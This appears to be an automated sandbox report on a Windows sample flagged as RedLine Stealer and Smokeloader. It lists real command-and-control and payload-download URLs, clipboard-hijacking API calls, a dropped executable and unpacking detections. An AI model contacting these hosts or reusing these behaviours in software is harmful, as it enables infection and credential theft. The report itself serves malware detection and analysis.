                    Source: TP77MvSzt2.exe, 00000000.00000003.4081032702.0000000002E4B000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000002.4211126136.0000000002E4B000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000003.1836716816.0000000002E4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exen
                    Source: TP77MvSzt2.exe, 00000000.00000003.1836716816.0000000002E4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://176.113.115.37/ScreenUpdateSync.exeu
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966662150.00000000008CE000.00000004.00000020.00020000.00000000.sdmp, 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/%
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000954000.00000004.00000020.00020000.00000000.sdmp, 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmp, 9B3F.tmp.exe, 00000001.00000002.2966895028.0000000000903000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php:Ic
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpBH
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.phpNH
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php_JP
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/edd20096ecef326d.php~I
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966895028.000000000093A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177/ows
                    Source: 9B3F.tmp.exe, 00000001.00000002.2966662150.00000000008CE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://62.204.41.177;ah
                    Source: Amcache.hve.7.drString found in binary or memory: http://upx.sf.net
                    Source: TP77MvSzt2.exe, 00000000.00000003.4081032702.0000000002E25000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000002.4211126136.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
                    Source: TP77MvSzt2.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
                    Source: TP77MvSzt2.exe, 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
                    Source: TP77MvSzt2.exe, 00000000.00000003.4081032702.0000000002E25000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000002.4211126136.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE#
                    Source: TP77MvSzt2.exe, 00000000.00000003.4081032702.0000000002E25000.00000004.00000020.00020000.00000000.sdmp, TP77MvSzt2.exe, 00000000.00000002.4211126136.0000000002E26000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEO
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
                    Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.4:49730 version: TLS 1.2
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04831947 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_04831947
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_004016E3 __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016E3

                    System Summary

                    barindex
                    Malicious sample detected (through community Yara rule)
                    Source: 00000000.00000002.4210942714.0000000002DA9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000001.00000002.2966797377.00000000008D9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
                    Source: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04832621 NtdllDefWindowProc_W,PostQuitMessage,0_2_04832621
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0483237D NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_0483237D
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_004280420_2_00428042
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_004071D00_2_004071D0
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_004373F90_2_004373F9
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_004274A40_2_004274A4
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0042D50E0_2_0042D50E
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_004285800_2_00428580
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_004166CF0_2_004166CF
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_004137450_2_00413745
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_004278160_2_00427816
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0040E9990_2_0040E999
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_00427AC00_2_00427AC0
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_00418ACF0_2_00418ACF
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0042EB000_2_0042EB00
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_00436CDF0_2_00436CDF
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_00427D870_2_00427D87
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_00413F2B0_2_00413F2B
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_048587E70_2_048587E7
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0485770B0_2_0485770B
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0485D7750_2_0485D775
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_048441920_2_04844192
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0485ED670_2_0485ED67
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_048582A90_2_048582A9
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0483EC000_2_0483EC00
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04857D270_2_04857D27
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04848D360_2_04848D36
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0485ED670_2_0485ED67
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04857FEE0_2_04857FEE
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04866F460_2_04866F46
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_048439AC0_2_048439AC
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_048469360_2_04846936
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04857A7D0_2_04857A7D
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: String function: 004045C0 appears 317 times
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: String function: 00410740 appears 52 times
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: String function: 0040F928 appears 36 times
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: String function: 048409A7 appears 52 times
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: String function: 0040FDD7 appears 123 times
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: String function: 0484003E appears 119 times
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 1076
                    Source: TP77MvSzt2.exeBinary or memory string: OriginalFileName vs TP77MvSzt2.exe
                    Source: TP77MvSzt2.exe, 00000000.00000002.4209128462.0000000000400000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs TP77MvSzt2.exe
                    Source: TP77MvSzt2.exe, 00000000.00000003.1780034064.00000000048A0000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs TP77MvSzt2.exe
                    Source: TP77MvSzt2.exe, 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: OriginalFileNameScreenshoter.exeF vs TP77MvSzt2.exe
                    Source: TP77MvSzt2.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
                    Source: 00000000.00000002.4210942714.0000000002DA9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000001.00000002.2966797377.00000000008D9000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                    Source: 00000001.00000002.2967063602.0000000000B00000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: 00000000.00000002.4211450280.0000000004830000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                    Source: TP77MvSzt2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: 9B3F.tmp.exe.0.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: classification engineClassification label: mal100.troj.evad.winEXE@4/7@1/3
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_02DAA6A6 CreateToolhelp32Snapshot,Module32First,0_2_02DAA6A6
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00413720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,1_2_00413720
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\track_prt[1].htmJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeMutant created: \Sessions\1\BaseNamedObjects\48rt8k8rt4rwe5rb
                    Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5440
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeFile created: C:\Users\user\AppData\Local\Temp\9B3F.tmpJump to behavior
                    Source: TP77MvSzt2.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: TP77MvSzt2.exeReversingLabs: Detection: 47%
                    Source: unknownProcess created: C:\Users\user\Desktop\TP77MvSzt2.exe "C:\Users\user\Desktop\TP77MvSzt2.exe"
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeProcess created: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe "C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe"
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5440 -s 1076
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeProcess created: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe "C:\Users\user\AppData\Local\Temp\9B3F.tmp.exe" Jump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: pcacli.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: msimg32.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: msvcr100.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: rstrtmgr.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior

                    Data Obfuscation

                    barindex
                    Detected unpacking (changes PE section rights)
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeUnpacked PE file: 0.2.TP77MvSzt2.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.sohumi:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeUnpacked PE file: 1.2.9B3F.tmp.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
                    Detected unpacking (overwrites its own PE header)
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeUnpacked PE file: 0.2.TP77MvSzt2.exe.400000.0.unpack
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeUnpacked PE file: 1.2.9B3F.tmp.exe.400000.0.unpack
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0041EC7E LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0041EC7E
                    Source: TP77MvSzt2.exeStatic PE information: section name: .sohumi
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_00410786 push ecx; ret 0_2_00410799
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0043DB97 push dword ptr [esp+ecx-75h]; iretd 0_2_0043DB9B
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0040FDB1 push ecx; ret 0_2_0040FDC4
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_02DAD2BC push 00000003h; ret 0_2_02DAD2C0
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_02DAB4F3 push es; iretd 0_2_02DAB504
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_02DAFA45 push ecx; ret 0_2_02DAFA62
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_02DAF8C7 pushad ; ret 0_2_02DAF8E3
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_02DAB9CE push E8665AC8h; iretd 0_2_02DAB9D3
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_02DADF89 push FFFFFFADh; ret 0_2_02DADFFB
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04840018 push ecx; ret 0_2_0484002B
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04869E08 pushad ; retf 0_2_04869E0F
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_04867FBD push esp; retf 0_2_04867FBE
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_048679BF push esp; retf 0_2_048679C7
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_048409ED push ecx; ret 0_2_04840A00
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_0041B035 push ecx; ret 1_2_0041B048
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_0040020D pushfd ; iretd 1_2_00400211
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_008DE523 push eax; ret 1_2_008DE541
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_008DE532 push eax; ret 1_2_008DE541
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_008DB553 push 7DD07DC0h; iretd 1_2_008DB564
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_008DAA4D pushfd ; iretd 1_2_008DAA50
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B1B29C push ecx; ret 1_2_00B1B2AF
                    Source: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeCode function: 1_2_00B00F59 pushfd ; iretd 1_2_00B01078
                    Source: TP77MvSzt2.exeStatic PE information: section name: .text entropy: 7.6648823522119836
                    Source: ScreenUpdateSync[1].exe.0.drStatic PE information: section name: .text entropy: 7.481613035763361
                    Source: 9B3F.tmp.exe.0.drStatic PE information: section name: .text entropy: 7.481613035763361
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeFile created: C:\Users\user\AppData\Local\Temp\9B3F.tmp.exeJump to dropped file
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\ScreenUpdateSync[1].exeJump to dropped file
                    Source: C:\Users\user\Desktop\TP77MvSzt2.exeCode function: 0_2_0040E999 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_0040E999
